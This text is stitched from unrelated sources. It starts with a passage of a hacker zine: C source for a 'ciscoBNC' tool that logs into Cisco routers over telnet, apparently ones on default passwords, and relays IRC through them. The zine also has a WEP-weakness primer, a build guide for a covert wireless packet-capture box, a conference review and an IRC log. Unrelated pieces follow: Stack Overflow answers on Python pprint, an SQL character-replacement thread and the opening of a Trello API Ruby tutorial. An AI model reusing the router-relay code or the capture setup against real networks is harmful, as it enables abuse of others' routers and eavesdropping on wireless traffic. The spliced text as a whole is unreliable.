    return -1;
  }
  setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int));
  saddr.sin_family = AF_INET;
  saddr.sin_port = htons (port);
  saddr.sin_addr.s_addr = INADDR_ANY;
  if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) {
    perror ("bind()");
    return -1;
  }
  /* only 5 connections at a time heh!@ */
  if (listen (sock, 5) == -1) {
    perror ("listen()");
    return -1;
  }
  return sock;
}

int
serve_client (int sock)
{
  char buf[1024];
  char doitup[250];
  char mbuf[1024];
  int connected_to_router = 0;
  int connecting_to_irc = 0;
  int sent_pass_once = 0;
  int r_sock;
  char *routername;
  char *routerpass;
  char *ircservname;
  char *ircport;
  char myuser[20], mynick[20];

  srand (time (NULL));  // seed random # generator
  snprintf (myuser, sizeof (myuser), "user%d", rnd1toN (99));
  snprintf (mynick, sizeof (mynick), "d0ud%d", rnd1toN (99));

repeatdoitup:
  routername = NULL;
  routerpass = NULL;
  ircservname = NULL;
  ircport = NULL;
  server_notice (sock, "**************TO CONTINUE*******************");
  server_notice (sock, "HELP ME OUT CLICK ADS AT !!");
  server_notice (sock, "/QUOTE DOITUP router routerpass ircserver ircserverport");
  server_notice (sock, "EXAMPLE /quote doitup 1.1.1.1 mypass irc.LOL.com 6667");
  while (1) {
    if (readline_from_sock (sock, buf, sizeof (buf)) == -1) {
      perror ("readline_from_sock()");  //change.
      return -1;
    }
    if (!strncasecmp (buf, "DOITUP", strlen ("DOITUP"))) {
      char *p;
      strncpy (doitup, buf, sizeof (doitup));
      if ((p = strtok (doitup, " \r\n"))) {
        while ((p = strtok (NULL, " \r\n"))
               && (!routername || !routerpass || !ircservname || !ircport)) {
          if (!routername)
            routername = p;
          else if (!routerpass)
            routerpass = p;
          else if (!ircservname)
            ircservname = p;
          else if (!ircport)
            ircport = p;
        }
        if (!routername || !routerpass || !ircservname || !ircport)
          goto repeatdoitup;  // fuck you
        snprintf (buf, sizeof (buf),
                  "OK.. connecting to router %s with pass %s,ircserver %s: %s\n\nQUOTE something else if nothing happens\n",
                  routername, routerpass, ircservname, ircport);
        server_notice (sock, buf);
        goto doitup_done;  // goto
      } else {
        goto repeatdoitup;  //LOL
      }
    }
  }

doitup_done:
  while (1) {
    if (readline_from_sock (sock, buf, sizeof (buf)) == -1) {
      perror ("readline_from_sock()");  //change.
      return -1;
    }
    if ((r_sock = connect_to_tcphost (routername, 23, NULL)) != -1) {
      connected_to_router = 1;
      snprintf (mbuf, sizeof (mbuf), "connected to %s", routername);
      server_notice (sock, mbuf);
      while (1) {
        if (readline_from_sock (r_sock, buf, sizeof (buf)) == -1) {
          perror ("readline_from_sock()");  //change.
          // do something
        } else {
          // buf[strlen (buf) - 1] = '\0';
          if (strstr (buf, "assword:")) {  // send router passwd
            if (sent_pass_once) {  // failed already. reprompted
              // test this
              server_notice (sock, "ROUTER PASSWORD FAILED!!!");
              return -1;
            }
            sent_pass_once = 1;
            server_notice_from (sock, "Logging into router...", "ciscoBNC");
            /* send the password supplied in DOITUP; the original hardcoded
               "cisco" here and never used routerpass */
            snprintf (buf, sizeof (buf), "%s\r\n", routerpass);
            write (r_sock, buf, strlen (buf));
          } else if (buf[strlen (buf) - 1] == '>') {  // got cmd prompt
            if (connecting_to_irc) {  // failed. back at prompt.
              server_notice (sock, "connect irc port FAILED!!");
              return -1;
            }
            server_notice_from (sock, "trying connect irc server", routername);
            // write (r_sock,
            //        "telnet Sterling.VA.US.UnderNet.org 6667\r\n",
            //        strlen ("telnet Sterling.VA.US.UnderNet.org 6667\r\n"));
            snprintf (buf, sizeof (buf), "connect %s %s\r\n", ircservname, ircport);
            write (r_sock, buf, strlen (buf));
            connecting_to_irc = 1;
          } else if (strstr (buf, "Open")) {  // connection opened!
            snprintf (buf, sizeof (buf), "USER %s %s %s %s\r\n",
                      myuser, routername, ircservname, D_REALNAME);
            write (r_sock, buf, strlen (buf));
            snprintf (buf, sizeof (buf), "NICK %s\r\n", mynick);
            write (r_sock, buf, strlen (buf));
            relay_client_and_router (sock, r_sock);
            return 0;
          }
        }
      }
    } else {
      // fail!
      return -1;
    }
  }
}

int
server_notice (int sock, char *msg)
{
  char buf[1024];

  snprintf (buf, sizeof (buf), "NOTICE * :%s\r\n", msg);
  return write (sock, buf, strlen (buf));
}

int
server_notice_from (int sock, char *msg, char *from)
{
  char buf[1024];

  snprintf (buf, sizeof (buf), "%s: %s", from, msg);
  return server_notice (sock, buf);
}

// assumes we are connected to irc server from router already.
int
relay_client_and_router (int sock, int r_sock)
{
  char buf[1024];
  char buf1[1024];
  fd_set rfds;
  int retval;

  buf1[0] = '\0';  /* was uninitialized; first strcmp() below read garbage */
  while (1) {
    FD_ZERO (&rfds);
    FD_SET (sock, &rfds);
    FD_SET (r_sock, &rfds);
    retval = select (1023, &rfds, NULL, NULL, NULL);
    if (retval) {
      if (FD_ISSET (sock, &rfds)) {
        if (readline_from_sock (sock, buf, sizeof (buf)) > 0) {
          write (r_sock, buf, strlen (buf));
          strncpy (buf1, buf, sizeof (buf1));
          // save last thing sent. we will need this to stop shell echo from IOS.
        }
        // else..
      }
      if (FD_ISSET (r_sock, &rfds)) {
        if (readline_from_sock (r_sock, buf, sizeof (buf)) > 0) {
          if (strcmp (buf, buf1))
            write (sock, buf, strlen (buf));
          else {
            // printf ("IGNORING IOS ECHO\n");
          }
        }
      }
    }
  }
}

int
rnd1toN (int max)
{
  return (rand () % max) + 1;
}

--------------------------------------------------------------------------------
[Wireless Technology Exposed]========================[Vortek <vortek@gmail.com>]
--------------------------------------------------------------------------------

Wireless Technologies Exposed
Security and Specifications demystified

VORTEK

"Knowledge is a process of piling up facts; wisdom lies in their simplification."
  - Martin H. Fischer

Greetings. The purpose of this article is to explain a few things about wireless. I will not go in depth into the security features of the IEEE 802.11 specification families. However, I will cover the basics so you will understand enough to distinguish between the different specifications. You will know which to apply based on its level of security, and hopefully you will have enough knowledge to decide for yourself.

NOTE: I will assume you know the RAW basics of some things. If you do not, google.com them. This article is not meant to be a novel. Besides, you will learn a thing or two. Now grab your favorite beer, wraps or stimulant drink and let's get started! Grab that shit, I'm serious!

The IEEE 802.11 family of specifications is broken down into 4 types. Well, 3 officially.
We will begin by breaking down the basics of each type and its features. We will cover its air waves, its basic features of speed, range and such, and its basic security. The first specification we will start with is older than an unpatched Chinese server. I didn't cover plain 802.11 because it's ANCIENT!

802.11A

This specification operates on the 5GHz band, which is good because most of your current household phones work on the overcrowded 2.4GHz band. The downfall to this higher frequency range is its inability to penetrate walls and obstructions, which can be quite cumbersome. It also carries a higher cost for its equipment, let alone its crappy range. Expect to get a maximum speed of 54 Mbps.

Now the A specification uses orthogonal frequency division multiplexing (OFDM). OFDM basically splits radio signals into a lot of smaller sub-signals, which in turn are transmitted simultaneously on different frequencies towards the receiver. This reduces some of the crosstalk also. If you'd like more info on OFDM, google it. This is an article, not a novel.

802.11B

This specification operates in the 2.4GHz band. This means overcrowded: don't use it close to microwaves or 2.4GHz cordless phones. Now this frequency penetrates walls a heck of a lot easier. Set your channels right on your wireless router and your signal can go 3 floors down. You also get much more range with B. Now don't expect much speed from this specification -- it's only 11 Mbps -- but it's a more stable signal. These products also tend to be cheaper in cost and more widely used.

The 802.11B specification uses direct sequence spread spectrum (DSSS). Basically there is a chipping code that uses a redundant bit pattern for each bit that is transmitted, which in turn aids in resistance to interference. If any of the bits are corrupted, the original data can be recovered due to the redundancy of the transmission. Basically THIS MEANS ERROR CORRECTING! Want more info? Google for DSSS.
802.11G

This is nothing more than the best of A and B mixed. It's 2.4GHz at 54Mbps. It is also backwards compatible with B. G also uses OFDM. Now there are some routers that go way beyond 54Mbps with Turbo modes, but why? You're not running some huge fiber-optic network, are you?

802.11 (pre) N

We will cover this after the security section, which I will explain later.

Ok, the security of these is basically all the same: crappy WEP, and WPA1, which is basically nothing more than what was workable from 802.11i at the time.

We all know why WEP is insecure. It breaks the #1 cardinal RULE OF RC4: NEVER EVER REPEAT THE KEYS. The problem with WEP is not in RC4 itself, as you can see. The problem is that the idiots who made 802.11 did not specify how IVs ("Initialization Vectors") should be created; also, the algorithm is pure crap. WEP uses 24 bits for its IV value range, which, as you can see, we could easily use up with high volume traffic. This basically means that the same IV will be used with a different data packet! "BREAKING THE RC4 Cardinal RULE!" What if there is no traffic, you ask? There are methods to force traffic. >:) IF you want to know them, read a WEP cracking tutorial. There are plenty of good ones on google.com.

Now just to clarify a few things, you may wonder what the IV really is. 24-bit values are attached to the secret key and used in the RC4 cipher stream. The reason we have IVs is to ensure that the value used as a seed for the RC4 PRNG ("Pseudo Random Number Generator") is always different. Ok, what does all this mean? I record all your WEP traffic until I receive 2 packets that have the same IV, and hence the same RC4 keystream; I can then use a XOR function to link the 2 packets, cancel the keystream out, and work towards the key. In other words, do not use WEP AT ALL. I don't care how elite your crypto key is.

Ok, now let's cover WPA1, which is basically nothing but a TKIP ("Temporal Key Integrity Protocol") wrapper around WEP. For starters, this prevents the repeat attacks that WEP has by extending the IV to 48 bits.
And by now we all know that IVs are used to encrypt the data in the packet. Now TKIP adds a few security enhancements to WEP. The first is the cryptographic message integrity code (MIC), which prevents forgery; it's basically a cryptographic checksum that protects against forgery attacks. The second feature, IV sequencing with the TSC ("TKIP Sequence Counter"), prevents replaying of data. Basically, the TSC in the IV had better fall within a certain range when received, or the packets are dropped. The 3rd method is the per-packet key mixing function. Basically this means that we're changing the encryption key every now and then for the client. It also provides an integrity checker. This method is a little too advanced to cover here.

Now remember, boys and girls, this is all based on RC4. Now the good stuff: WPA2.

WPA2 is a full implementation of certified 802.11i. It uses AES-CCMP ("AES (C)ounter Mode (C)BC-(M)AC (P)rotocol"). This is also the standard for the Pre-N series of routers. WPA2 utilizes many advanced features over WPA1. The #1 feature is AES (Advanced Encryption Standard). It's basically military crypto warez, so no more crappy RC4. It also uses the PMK (Pair-wise Master Key), which allows you to reconnect to your access point if, let's say, you walked to another AP and back. "You will not have to re-authenticate." Also, pre-authentication allows you to pre-authenticate to another AP while holding your connection to your existing AP. Basically you only need 1/10th of a second to change APs while roaming. Now if you don't use pre-authentication with PMK caching, it would take more than a second, and some of your time sensitive crap like video, VoIP and other crap will go FUBAR!

Ok, for the other features: for starters we get forced 128 bit keys!!! h0h0h0h0! Basically everything else is the same as WPA except for the AES standard and PMK. But for you people who want more info... I will just post information from the computing dictionary. Official Computing Dictionary definition below.
"IF you want more info on this you're really going to have to do a LOT of reading."

There is no point in trying to refine something so short and true... call me a copy cat if you like. Ok, now time for the phat lady to sing!

802.11 (pre-N)

This is basically 802.11i with certified WPA2, which in turn is a full certified implementation of 802.11i. Now the reason we use pre-N is because there is a battle going on in standards. We will not get into that here, but basically it's like what happened in the old days with the 56k modem standards: Rockwell vs. US Robotics.

Now the advantages to pre-N are huge. You get GREAT EXTENDED RANGE. This is achieved by using something called MIMO (Multiple Input Multiple Output), in which a number of antennas transmit many unique data streams in the same frequency channel (other Wi-Fi products transmit data in a single stream in a single channel). MIMO also uses OFDM, which you should remember from above. You basically get 3 antennas. The advantages are more range, less interference, and a funky looking evil router. Oh yeah, it's backwards compatible with B and G.

Now you know the VERY raw basics of wireless -- well, what happens beyond the GUI in your Wintendo XP wireless configuration. Be sure to upgrade XP to support WPA2. Now let's all go to France and do some war driving; we can hack their WHITE-FLAG Linux boxes. After one failed login you get root and a system message of "I surrender." I don't hate French people, don't worry!

And one last message to all you knew skewl kiddies: READ READ LEARN! And be glad you can google.com, for it was not always this easy to GET INFORMATION!

Send hate mail to vortek@gmail.com

h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0..........................................
--------------------------------------------------------------------------------
[Harriet the Spy]======================================[Dreid <dreid@dreid.org>]
--------------------------------------------------------------------------------

Harriet the Spy
===============

What is Harriet the Spy?
------------------------

Harriet the Spy is designed to be a relatively low cost solution for creating a stationary, battery-operated wireless packet capture system.

Yes but what does that mean?
----------------------------

It means that it's a computer whose only job is packet capture, and it can be left in one place for an extended period of time, to capture packets for a specific wireless network or set of wireless networks.

What is it made of?
-------------------

The most basic configuration for Harriet requires an 802.11a, b or g router that is similar to or compatible with the Linksys WRT54G(S) series of routers, in that it can run an open source Linux based firmware. For my experiments I used a WRT54G version 2 [1], and OpenWRT [2]. It also includes a battery pack made of 4 1.5v alkaline batteries.

How to make it.
---------------

The Battery pack.
+++++++++++++++++

The battery pack used will likely fall somewhere in this rough description no matter what kind of compatible router you get. The number of batteries you need might vary depending on the actual power usage of the router. I'm not an electrical engineer, but I do know that most consumer electronics devices do not require the full output voltage of their DC wall adapters. The WRT54G, for instance, has a 12v DC power adapter, but it can run on 6v DC without any problem.

So the basic parts list for this part of the project is this:

* 1 DC Size M plug.
* 4 1.5v alkaline batteries.
* 1 battery holder of the same size.

In theory the only thing the cell size of the battery would affect in this case would be runtime, so you could use anything from AA to D.
I chose D for this as I just wanted to see how long I could keep it running for. The manufacture of this battery pack is very simple and requires very minimal soldering skill (read: you should know which end to hold.) Simply take the wires from the battery holder, and solder them to the positive and negative leads on the DC Size M plug. Insert the batteries into the holder, and that's all she wrote about that. You can now power any device which can be sustained on 6v DC.

The Router and OS
+++++++++++++++++

Flashing OpenWRT onto a WRT54G or compatible router is a well documented process, and can be found here [3]. The client mode configuration is also well documented and can be found here [4]. When installing kismet you should install the kismet_server package, and turn off the wireless interface prior to starting it.

The Test
--------

The base test for battery life was to plug in the router, start up kismet, and then take a voltage reading of each battery under load. Then after an hour I'd take the readings again, and approximate how many hours before the batteries were operating at less than 30% capacity.

The initial readings were: 1.31, 1.36, 1.35, 1.34 for a total of 5.36V. After two hours the voltages read: 1.01, 1.08, 1.05, 0.95 for 4.09V. That's a 1.27V difference. If we assume the voltage drop to be linear, then every two hours we would lose 1.27V, with 1.78V being the magical 30% capacity mark. So that's about 6hrs of battery life, which isn't too shabby for the cost of production. You could capture a lot of packets in 6hrs.

Potential Problems and Potential Improvements
---------------------------------------------

So right now Harriet is capable of sitting around for 6 hours unattended, capturing packets. Of course, since it only has 4MB of storage if you're using a WRT54G, and 8MB if you're using a GS, it can only capture so many packets -- especially since at least 2MB of flash is being taken up by the OS.
However, one planned improvement is to add an SD card [5], which will give up to 2GB of storage. Other options would be adding a USB port and using an IDE storage device. Yet another option would be using an 802.11b ethernet bridge or USB 802.11b adapter connected to a nearby network for packet capture (just make sure you're not capturing that network's packets.)

Another potential problem is that as the batteries lose power, one could potentially damage the router hardware. This problem could be overcome by adding a low-power cut-off circuit. Also, the price of D-cell alkaline batteries is rather expensive over time, and one could find a much more suitable source of power, including rechargeable NiMH batteries like those used in RC cars and Airsoft guns, or even the more expensive though very reliable and long lasting Li-Poly batteries for the higher end RC vehicles.

Final Thoughts
--------------

All things considered, I believe the initial revision of Harriet the Spy is quite a success. The next steps in its evolution will be the above-mentioned low-power cut-off circuit, and the addition of an SD card reader. Then I hope to field test the device in a high traffic wireless deployment. After that I'll begin experimenting with a variety of rechargeable and longer lasting battery solutions.

Footnotes
---------

[1]
[2]
[3]
[4]
[5]

--------------------------------------------------------------------------------
[Review of ToorCon]===================================================[overdose]
--------------------------------------------------------------------------------

Overview of Toorcon, San Diego California's premiere security conference
By OverDose

Well, first things first: I went to Toorcon, and the first night was a sort of meet and greet. There were a lot of people already there, people that were affiliated with Defcon, Layer 1, and a few other conferences I had attended. There were hors d'oeuvres and an awesome social atmosphere.
There were of course people talking about newer tools, recent compromises that were public, and things that had happened to end users at their employers.

Saturday was the day that things got swinging. There were 2 tracks of speakers, cleverly named Smoke and Mirrors. The Smoke track, which is synonymous with digital security, had several speakers ranging from a BBS documentary Q&A (a documentary about BBSes, and a MUST WATCH) to how hackers get caught. On the other track, Mirrors, synonymous with network security and trust, talks ranged from hacker versus the mobile phone to anonymous communication for the Dept. of Defense... and you.

Saturday night was awesome. The wonderful people at Toorcon had set up a party for us in the Galileo 101 in downtown San Diego, really close to the convention center where Toorcon was held. It was a two story bar of sorts, with DJs spinning lots of house, lounge, trance, and many other electronica styles. The drinks were good but expensive. Nevertheless, it was an awesome time to be had by ANY geek who was down for a party.

Sunday, Sept 18th, was the day that wrapped up the con, but don't let that fool you. There were many people still around and having an awesome time, chatting among each other as well as checking out the Sunday speeches. Sunday's Smoke track ran everything from infrared hacking to a law enforcement panel, and the Mirrors portion ranged from a Running a Small Hacker Conference panel to the Future of Phishing. It really DID have it all and then some.

I want to close by saying thanks to h1kari, nfiltr8, geo, phil, SoMe_BoDy, freshman, arachne, and everyone else that helped put Toorcon together. You guys did an awesome job. One thing I HAVE to bring up was the lax environment and the courtesy towards all of the attendees.
If anyone has been to a hacker con, generally you get souvenirs that you must pay for, generally from a vendor area. This is one area where, delightfully, Toorcon differentiates itself: they gave EVERY attendee an official Toorcon shirt with dates/locations and things of this nature. How cool is it that these people appreciate each and every attendee so much that they would give them all an awesome souvenir just for attending?

That's all I can say about Toorcon. If you are in the mood for a relaxing and informative time in the San Diego area, I highly suggest you attend Toorcon.

--------------------------------------------------------------------------------
[This issue's LAMER.log]====================================[#espionage @ efnet]
--------------------------------------------------------------------------------

1.9 GIGAHERTZ! 1.9 GIGAHERTZ! Yup! This, from the immature guy who went off on someone and told them to read an RF (radio frequency) book! ttransien also claims to be an ex l0pht member, but after talking to him for five minutes it's clear that he's too much of a moron to ever be in l0pht.

[20:39] <ttransien> lothos
[20:40] <uplink> trans
[20:40] <uplink> you code?
[20:40] <ttransien> wut
[20:40] <ttransien> of course
[20:40] <uplink> I learned C
[20:40] <ttransien> didn't you download myelite software like everyone else?
[20:40] <lothos> ttransien
[20:40] <uplink> no
[20:40] <ttransien> :-o
[20:40] <uplink> haven't even seen it
[20:40] * uplink sets mode: +vvvv Christ cia darkhmet lothos
[20:40] * uplink sets mode: +vvvv migzy Rav^ v_id |-|acks
[20:40] <lothos> your bluetooth software?
[20:40] <uplink> :O
[20:40] <ttransien> h0h0 mvoice
[20:41] * uplink sets mode: -vvvv playd0h trans ttransien uplink
[20:41] <uplink> we're leet with +O's
[20:41] <uplink> we don't need voiced
[20:41] <uplink> we don't need voices
[20:41] <ttransien> dewd don't play around you'll soon be out of control
[20:41] <uplink> h0h0h
[20:41] <uplink> I gotta go for a sec
[20:41] <uplink> brb
[20:41] <ttransien> you are 17 it is easy to forget things and go out of control
[20:41] <ttransien> bye >:D<
[20:41] <ttransien> nevermind you are too young to hug that is way gay
[20:45] <uplink> h0h0
[20:58] <ttransien> hi
[20:59] <ttransien> dood if i sit my cell phone by the monitor
[20:59] <ttransien> my monitor flips out right before my ophone rings
[20:59] <lothos> iden is notorious for that
[20:59] <lothos> speakers as well
[20:59] <lothos> and tv
[21:00] <ttransien> 1watt or so at maybe 1.9GHz
[21:00] <ttransien> but 1.9GHz is not the refresh rate of my monitor!
[21:00] <ttransien> and i doubt it's even a harmonic :D
[21:00] <ttransien> so i wonder what's happening
[21:02] <lothos> those are the worst phones as far as radiation
[21:02] <ttransien> i bet it does it if i make a call too
[21:02] <ttransien> let me try
[21:02] <lothos> yup
[21:02] <lothos> and iden works on 800mhz
[21:02] <ttransien> iden?
[21:02] <lothos> 806-866 MHz
[21:02] <lothos> nextel is not gsm
[21:02] <lothos> it is iden
[21:02] <ttransien> why do you think i'm on that freq
[21:03] <lothos> if you have nextel that is your freq
[21:03] <ttransien> dood i'm out of the states right now
[21:03] <ttransien> as previously mentioned
[21:03] <lothos> Integrated Dispatch Enhanced Network
[21:05] <lothos> iden is 800mhz
[21:05] <ttransien> you've mentioned that
[21:05] <lothos> yes
[21:05] <ttransien> however i am not in the united states currently as mentioned two or three times
[21:05] <lothos> do you have a loaner phone?
[21:05] <ttransien> a business phone [21:06] <ttransien> belongs to the company [21:06] <lothos> did they give you a phone to use overseas? [21:06] <ttransien> no, the phone was already overseas [21:06] <ttransien> purchased locally [21:06] <lothos> is that thru nextel? [21:06] <ttransien> of course not [21:06] <ttransien> we use the local network [21:06] <lothos> europe? [21:06] <ttransien> asia [21:06] <lothos> 900mhz or 1800mhz then [21:06] <uplink> yo [21:06] <uplink> I'm gonna get a 5mbit connection [21:06] <lothos> not 1.9ghz [21:07] <ttransien> where do they use 1900 [21:07] <lothos> the usa [21:07] <lothos> 850/1900 is usa gsm [21:07] <ttransien> rgr [21:07] <lothos> i'm guessing you're on 900 mhz from the way it interacts with the monitor [21:07] <ttransien> what in the monitor would resonate at 800mhz [21:07] <lothos> who knows, i just know cellular [21:08] <ttransien> btw my nextel is gsm; it was advertised as such and i used it in singaporre [21:08] <lothos> maybe it is then [21:08] <ttransien> i have to pay more for my plan [21:08] <lothos> you should be able to use it in asia then [21:08] <ttransien> i am getting a call in [21:08] * Christ (c@220-245-133-132-vic-pppoe.tpgi.com.au) Quit (Ping timeout: 276 seconds^O) [21:08] <ttransien> i can see it :D [21:08] <lothos> unless you're in south korea [21:08] <lothos> they use cdma not gsm [21:08] <lothos> or japan [21:08] <lothos> japan does not use gsm [21:09] <ttransien> i don't know what bands my phone supports [21:09] <ttransien> i do have it in a box somewhere i just didn't try [21:09] * Christ (c@60-240-128-36.tpgi.com.au) has joined #espionage [21:09] <lothos> what country are you in? 
[21:09] <ttransien> i have a locally purchased phone paid for y the company [21:09] <ttransien> i am in cyberia :D [21:14] <ttransien> anyway let's talk until my ride gets here [21:14] <ttransien> i have nothing else to do [21:14] <ttransien> entertain me [21:15] <ttransien> ok i'll begin [21:15] <ttransien> it is interesting to note that the interference only occurs before the phone rings [21:15] <ttransien> which leads me to believe 2 things [21:15] <ttransien> 1 - the phone ramps down power during negotiation with the tower [21:15] <ttransien> 2 - i have a good signal [21:15] <ttransien> 2 is confirmed by my signal bars on the display [21:16] <ttransien> uplink would you like to interject an observation at this point? [21:17] <ttransien> bbl [21:17] * ttransien (~transient@get-o.net) Quit (^B[^BBX^B]^B Pretzel Boy uses BitchX. Shouldn't you?^O) -------------------------------------------------------------------------------- [/dev/urandom]=========================================[Random Facts and links ] -------------------------------------------------------------------------------- # The Most Annoying way to make a pop-up, EVER. # Make a website not display for people using Internet Explorer: <? if (preg_match("/MSIE/i", $_SERVER["HTTP_USER_AGENT"])) { header("Location:"); exit(); }; ?> <html> <head> <title>This site will not display in Internet Explorer</title> </head> <body> </body> </html> # SMS email gateways for the US cellular providers: # Practical Resources for Securing Computers: -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. 
If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer (of systems and great walls alike). -------------------------------------------------------------------------------- All submissions to: kv@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____|[] \_____/[] \_____/[] z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2005 legions.org, all human rights reserved outside the US. 
-------------------------------------------------------------------------------- [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
http://packetstormsecurity.org/files/40484/kv14.txt.html
I'm trying to get a pretty print of a dictionary, but I'm having no luck:

>>> import pprint
>>> a = {'first': 123, 'second': 456, 'third': {1:1, 2:2}}
>>> pprint.pprint(a)
{'first': 123, 'second': 456, 'third': {1: 1, 2: 2}}

I wanted the output to be on multiple lines, something like this:

{'first': 123,
 'second': 456,
 'third': {1: 1,
           2: 2}
}

Can pprint do this? If not, then which module does it? I'm using Python 2.7.3.

Use width=1 or width=-1:

In [33]: pprint.pprint(a, width=1)
{'first': 123,
 'second': 456,
 'third': {1: 1,
           2: 2}}

You could convert the dict to JSON through json.dumps(d, indent=4):

import json
print(json.dumps(item, indent=4))

{
    "second": 456,
    "third": {
        "1": 1,
        "2": 2
    },
    "first": 123
}

If you are trying to pretty print the environment variables, use:

pprint.pprint(dict(os.environ), width=1)

Two things to add on top of Ryan Chou's already very helpful answer:

- pass the sort_keys argument for an easier visual grok on your dict, especially if you're working with pre-3.6 Python (in which dictionaries are unordered):

print(json.dumps(item, indent=4, sort_keys=True))
"""
{
    "first": 123,
    "second": 456,
    "third": {
        "1": 1,
        "2": 2
    }
}
"""

- dumps() will only work if the dictionary keys are primitives (strings, ints, etc.)

The answers are collected from Stack Overflow and are licensed under CC BY-SA 2.5, 3.0, and 4.0.
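That last caveat is worth seeing in action: json.dumps needs primitive keys, while pprint has no such restriction. A small standard-library sketch (the data dict is made up for illustration):

```python
import json
import pprint

# Tuple keys: fine for pprint, rejected by json.dumps.
data = {("host", 80): {"hits": 3}, ("host", 443): {"hits": 7}}

try:
    as_json = json.dumps(data, indent=4)
except TypeError:
    # json.dumps only accepts str/int/float/bool/None as keys
    as_json = None

print(as_json)                        # None
print(pprint.pformat(data, width=1))  # pretty-prints the tuple keys happily
```

So for quick debugging of arbitrary Python objects, pprint is the safer default; reach for json.dumps when you know the data is JSON-shaped.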
https://techstalking.com/programming/python/pprint-dictionary-on-multiple-lines/
select ascii('ü')

select replace('aosidmfüasdfom', 'ü', 'X')

With a table it would be:

select replace(fieldvalue, 'ü', '') from tablename

create function dbo.replace_extended_char
(
    @char char(1)
)
returns char(1)
as
begin
    return (
        select case
            when ascii(@char) < 127 then @char
            else
                case @char
                    when 'Ç' then 'C'
                    when 'ö' then 'o'
                    when 'ä' then 'a'
                    when 'Ö' then 'O'
                    else '?'
                end
        end
    )
end
go

Then you need "driver code" that sends each extended character (only) to the function. More on that later if needed :-)

The normal "printable" characters range from 32 to 126 inclusive - before that you have carriage returns, tabs, line feeds etc... It goes up to 255 in the ANSI character set, so there are potentially 255-126 characters to be checked. Ouch.

The challenge will be what codeset, language, and binaries are being used, or whether you are assuming just ASCII characters and the English language. In which case, using physical character representations as acperkins does above will work OK...

In which case, the first step is to create a character map... Normally you create a table for that:

create table uCharMap (AsciiNumber int primary key, AsciiCharacter char(1), Printable char(1))
GO
declare @int int
set @int = 127
while @int < 256
begin
    insert uCharMap (AsciiNumber, AsciiCharacter) values (@int, char(@int))
    set @int = @int + 1
end
GO

then open the table and manually decide the most appropriate characters to substitute (a CSV for one prepared earlier is attached: ucharmap.csv.txt)...

Then you can do the function business (created below) as part of a select, or update, or whatever, e.g.

select dbo.ufix_characters('ABCDe...')

I want to run it on a table called products, on a field called name for all possible replacements. Thanks!

First you test it with

select name as oldname, dbo.ufix_characters(name) as newname from products

then if you are happy... 
update products set name = dbo.ufix_characters(name)

You could probably add in a "where" clause - something like a pattern match (patindex) for characters not in the range of 0-9 and A-Z - but if it's a once-off job, just choose a quiet time... But test first!!
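If you'd rather do the same cleanup outside the database, the character-map idea translates directly to Python. This is only a sketch: the map entries and the '?' fallback mirror the T-SQL function above, and a real job would need a much fuller map:

```python
# Characters above ASCII 126 get mapped to plain equivalents; anything
# unmapped falls back to '?', like the T-SQL function's else branch.
CHAR_MAP = {'Ç': 'C', 'ö': 'o', 'ä': 'a', 'Ö': 'O', 'ü': 'u'}

def fix_characters(text):
    out = []
    for ch in text:
        if ord(ch) < 127:
            out.append(ch)          # plain ASCII passes through untouched
        else:
            out.append(CHAR_MAP.get(ch, '?'))
    return ''.join(out)

print(fix_characters('aosidmfüasdfom'))  # aosidmfuasdfom
```

As with the SQL version, run it against a copy of the data first and eyeball the substitutions before updating anything in place.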
https://www.experts-exchange.com/questions/23809769/How-to-find-and-replace-characters-like-etc.html
Handling Paginated Resources in Ruby

Wrap your paginated collections in Enumerable goodness

The thing with paginated data is we can't get it all at once. Let's say we're using the Trello API. There are a number of Trello endpoints that return paginated data sets, such as boards, lists, cards, and actions (like comments, copies, moves, etc.). If we're querying for Trello cards marked as completed each month since last January, for example, we may need to request several pages of "cards". In most cases, Trello will provide a default limit, typically 50, on the number of resources returned in a single request. But what if you need more than that? In this post, we'll examine a few ways to collect paginated results in Ruby.

Trello World

The Trello developer docs provide a quickstart in JavaScript - here's the unofficial Ruby version. While logged into your Trello account (you'll need one first), retrieve your app key. We won't need the "secret" for this article. Next, you'll generate an app token. Paste the following URL into your browser with your app key substituted for the placeholder. Now that we have an app key and token, we can make authenticated requests to the Trello API. As a quick test, paste the following URL with your own key and token as parameters into your web browser (or use curl) to read your member data. You should see a JSON response with attributes like your Trello id, username, bio, etc.

Script mode

